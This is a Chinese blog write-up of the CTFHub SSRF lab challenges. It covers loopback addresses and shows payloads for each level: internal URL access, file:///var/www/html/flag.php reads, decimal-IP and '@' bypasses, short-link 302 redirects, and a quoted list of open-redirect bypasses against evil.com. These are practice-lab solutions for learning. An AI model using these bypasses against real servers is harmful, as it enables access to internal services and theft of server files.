【ctfhub】SSRF

最新推荐文章于 2024-06-18 10:22:08 发布
最新推荐文章于 2024-06-18 10:22:08 发布
阅读量832 收藏 4
点赞数 2
分类专栏: html+css 刷题记录 文章标签: php 服务器 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61109509/article/details/123035738
版权

目录

SSRF

知识点:回环地址

内网访问

伪协议读取文件

 数字IP Bypass

 DNS 重绑定

URL Bypass

302跳转 Bypass

SSRF

在过滤了一堆中找ip本身

我们不能直接访问pc或moblie,必须通过server操作

直接改包很难,除非有说明是从本地来,否则严格的服务器不能通过改包实现

都是让服务器能够访问本地或者内网环境

知识点:回环地址

127.0.0.1

  • 这是一个最常见的回环地址。
  • 回环地址是什么呢?

 回环地址并非只有一个,所有127开头的都是回环地址。127.0.0.1~127.255.255.255


回环地址有什么用?


 计算机以回环地址发送的消息,并不会由链路层送走,而是被本机网络层捕获。用处只有一个,就是自己发给自己,自娱自乐



0.0.0.0


这个地址用于指代本机的所有ip地址,当然也包括回环地址。如果本机有多个网卡,那么0.0.0.0就代表所有网卡的ip加上所有的回环地址。


异同
如果前面看明白了,他们的异同也很明显了。

0.0.0.0包含127.0.0.1,都代表本机。(仅从本机视角去看)
0.0.0.0和127.0.0.1对其他主机都不可见
0.0.0.0代表一个ip集合,无法访问;127是单个ip可以访问



如果在网关路由表中设置0.0.0.0,他代表网关的所有ip,因此他会收容所有未知的请求。  

   

原文链接:https://blog.csdn.net/qq_41655115/article/details/107165698

内网访问

尝试访问位于127.0.0.1的flag.php吧

?url=http://127.0.0.1/flag.php

也可用ipv6 ,{::ffff:7f00:1} 代替127.0.0.1

伪协议读取文件

尝试去读取一下Web目录下的flag.php吧  

使用这个读不出来,php://filter/read=convert.base64-encode/resource=flag.php

查了一下,这个是文件包含中的,不能用于ssrf

 SSRF中的URL的伪协议:

  • file:///
  • dict:///
  • sftp://
  • ldap://
  • tftp://
  • gopher://

我们读取web目录下的文件,一般网站的目录都放在www/html/目录下,结合之前做题经验,直接构造url

?url=file:///var/www/html/flag.php

 数字IP Bypass

这次ban掉了127以及172.不能使用点分十进制的IP了。但是又要访问127.0.0.1。该怎么办呢

将127.0.0.1转换进制(每八位)

 十进制 2130706433

八进制 017700000001

二进制 1111111000000000000000000000001

?url=http://2130706433/flag.php

 DNS 重绑定

详解DNS重绑定攻击

URL Bypass

请求的URL中必须包含http://notfound.ctfhub.com,来尝试利用URL的一些特殊地方绕过这个限制吧

下图的实例中,我们看到上述所述编程语言的解析函数得到的IP是google.com,而cURL请求得到的却是evil.com:80

  

单斜线"/"绕过
https://www.landgrey.me/redirect.php?url=/www.evil.com
缺少协议绕过
https://www.landgrey.me/redirect.php?url=//www.evil.com
多斜线"/"前缀绕过
https://www.landgrey.me/redirect.php?url=///www.evil.com
https://www.landgrey.me/redirect.php?url=www.evil.com
利用"@"符号绕过
https://www.landgrey.me/redirect.php?url=https://www.landgrey.me@www.evil.com
利用反斜线""绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com\www.landgrey.me
利用"#"符号绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com#www.landgrey.me
利用"?"号绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com?www.landgrey.me
利用"\"绕过
https://www.landgrey.me/redirect.php?url=https://www.evil.com\www.landgrey.me
利用"."绕过
https://www.landgrey.me/redirect.php?url=.evil (可能会跳转到www.landgrey.me.evil域名)
https://www.landgrey.me/redirect.php?url=.evil.com (可能会跳转到evil.com域名)
10.重复特殊字符绕过
https://www.landgrey.me/redirect.php?url=///www.evil.com//…
https://www.landgrey.me/redirect.php?url=www.evil.com//…

这里我们用@绕过

/?url=http://notfound.ctfhub.com@127.0.0.1/flag.php

302跳转 Bypass

先访问?url=http://127.0.0.1/flag.php

这里是 短链接变换

短链接变换推荐链接:https://www.985.so/

短链接变换通过检索短网址上的数据库链接,再跳转原(长)链接访问。
实际上这就是一种302

1.用localhost代替127.0.0.1

这个可以

2.利用短域名

http://surl-2.cn/0nPI

http://dwz-1.ink/0ndbh

这两个都是直接访问本地127.0.0.1/flag.php

pipasound
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
flag.php
萍水间人的小天地
01-29 1832
写在前面 好吧我承认我是看了别人的wp,目前还很菜 然而我看了wp也不会做。 初探 页面 进去之后是一个什么都点不动的页面。。 然后有提示 hint 联系到可能是SQL注入 于是在URL后面加一个hint参数 http://123.206.87.240:8002/flagphp/?hint=1 得到一串代码: <?php error_reporting(0)...
WEB>SSRF(URL Bypass,数字IP Bypass,302跳转Bypass,DNS重绑定Bypass)
Ynh323的博客
05-08 1521
目录 一、URF Bypass 二、 数字IP Bypass 三、302跳转 Bypass 四、DNS重绑定Bypass 一、URF Bypass 题目: 解题思路: 1.根据上图提示构造 url=http://notfound.ctfhub.com@127.0.0.1/flag.php 2.访问得到flag 二、 数字IP Bypass 题目: 解题思路: 1.刚开始尝试访问url=127.0.0.1/flag.php 2. 根据上.
CTFHub技能树 Web-SSRF DNS重绑定 Bypass
Senimo
07-05 1840
CTFHub技能树 Web-SSRF DNS重绑定 Bypass hint:关键词:DNS重绑定。剩下的自己来吧,也许附件中的链接能有些帮助 启动环境,打开题目为空白,查看URL: http://challenge-cafd9f03daa84720.sandbox.ctfhub.com:10800/?url=_ 与之前一样的形式,查看?url=127.0.0.1/flag.php: 提示不允许企业内部IP访问,尝试使用file协议读取源码:?url=file:///var/www/html/index.
CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(一)(超详细总结)
最新发布
xt350488的博客
06-18 490
即服务器端请求伪造(Server-Side Request Forgery),是一种网络攻击技术,攻击者利用服务器上的应用程序向任意服务器发起请求或者操作,这些请求可能包括但不限于文件读取、命令执行、端口扫描等。在向服务器发送请求时,首先浏览器会进行一次URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次解码。码中的换行符,在URL的二次编码中不需要,否则会导致curl执行错误,导致我们拿不到正确的结果。替换完成之后,再次进行url编码,这里的url就是源码中的curl要执行的。
CTFHUB- DNS重绑定 Bypass(小宇特详解)
小宇的web博客
10-23 1586
CTFHUB- DNS重绑定 Bypass 1.用我的理解来说就是,用户访问一个特定的域名,然后这个域名原来是一个正常的ip。但是当域名持有者修改域名对应的ip后,用户再访问这个域名的时候,浏览器以为你一直访问的是一个域名,就会认为很安全。这个是DNS重绑定攻击 这个是我的理解 这里可以让用户访问一个域名,然后这个域名在访问127.0.0.1 这里我使用的是文中所写的那个网站 https://lock.cmpxchg8b.com/rebinder.html?tdsourcetag=s_pctim_aioms
CTFhub--SSRF
qq_46874275的博客
05-17 710
~目录~开始内网访问伪协议读取文件端口扫描POST请求 开始 内网访问 提示:尝试访问位于127.0.0.1的flag.php吧 直接url=127.0.0.1/flag.php 伪协议读取文件 提示:尝试去读取一下Web目录下的flag.php吧 URL的伪协议有以下几种: file:/// dict:// sftp:// ldap:// tftp:// gopher:// 读取web目录下的flag.php,利用file:/// url=file:///var/www/html/flag.php
【CTF整理】WriteUp Bugku flag.php
SunnyCat
10-30 886
WriteUp Bugku flag.php 题目:http://123.206.87.240:8002/flagphp 点击:flag.php 随便输入点击没有反应,右键查看源码,没什么有价值的发现 想到提示hint,将之作为url参数提交试试,出现php代码。 顺序:1、2、3、4、5、 <?php error_reporting(0); include_once("flag.php"); // 1、flag的位置 $cookie = $_COOKIE['ISecer']; //
你未见过的SSRF利用方式
06-20
SSRF (Server-Side Request Forgery:服务器端请求伪造) 是⼀种由攻击者构造形成,由服务端发起请求的⼀个安全漏洞 原因是由于服务端提供了从其他服务器应⽤获取数据的功能且没有对地址和协议等做过滤和限制 本⽂讲解...
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
CTFHub-Web-SSRF练习
Atkx's Blog
10-18 6238
这里写自定义目录标题内网访问伪协议读取文件端口扫描POST请求上传文件FastCGI协议 内网访问 题目描述:尝试访问位于127.0.0.1的flag.php吧 访问靶机地址,发现url后面多了/?url=_ 然后访问127.0.0.1/flag.php Payload: ?url=127.0.0.1/flag.php 伪协议读取文件 题目描述:尝试去读取一下Web目录下的flag.php吧 在SSRF中常用的伪协议是file:///协议,其在ssrf中可以用来读取php源码。 Payload
每天一道ctf
whisper921的博客
10-28 898
有这样一行代码
flag.php--cookie伪造分号必须url编码、unserialize()函数、serialize()
qq_32642035的博客
03-18 348
拿到题目 发现很干净,点击提交不发生流量,源码和header都没有发现线索 回到题目看到提示,提示:hint 题目为flag.php 线索可能有两个,hint参数和flag.php页面 尝试在各个页面通过get和post方式hint参数 发现主页提交参数得到源码 访问flag.php无显示内容 serialize()序列化函数 serialize() 返回字符串,此字符串包含了表示 valu...
初识CTF Day4 CTFHUBSSRF
suxinAL的博客
10-02 2147
前言 这一次是对ssrf的探索,ctfhub技能树web就快结束了,期待淦进阶 正文 SSRF 内网访问 题目告诉访问127就直接访问下试试,但是没想到这么简单 ?url=127.0.0.1/flag.php 伪协议读取文件 题目提示:尝试去读取一下Web目录下的flag.php吧 可以联想到web目录一般是存放在 var/www/html/ 里面 所以payload如下 ?url=file:///var/www/html/flag.php 进入该页面,查看页面源代码得到flag 端口扫描 题目提示:来来
flag就在flag.php,flag就在flag.php中
weixin_39610807的博客
03-11 625
Web1题目地址1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的4.抓包 发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密之后的 在登录成功跳转的那个页面还有一个...
第二十三天
weixin_46653764的博客
07-03 349
一、来做这个题 1、第一题 flag在这里 打开后是这样的,然后点开链接,跳转到404,可查看元素,该链接跳转的地址是↓ 所以应该是被重定向了,那我就burp抓包来repeater一下,然后就得到flag.php页面的回应,flag拿到手!!! 2、第二天 打开宝盒 根据题目,我就先保存图片文件看看吧,用pad++打开,一堆乱码,大概flag就藏在里面,但我找不到hhahah 3、 看题目 本地管理员?那就伪造ip,把ip改成127.0.0.1,这里就要用到http头里面的 X-Forwarde
CTFHub ssrf
07-29
所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值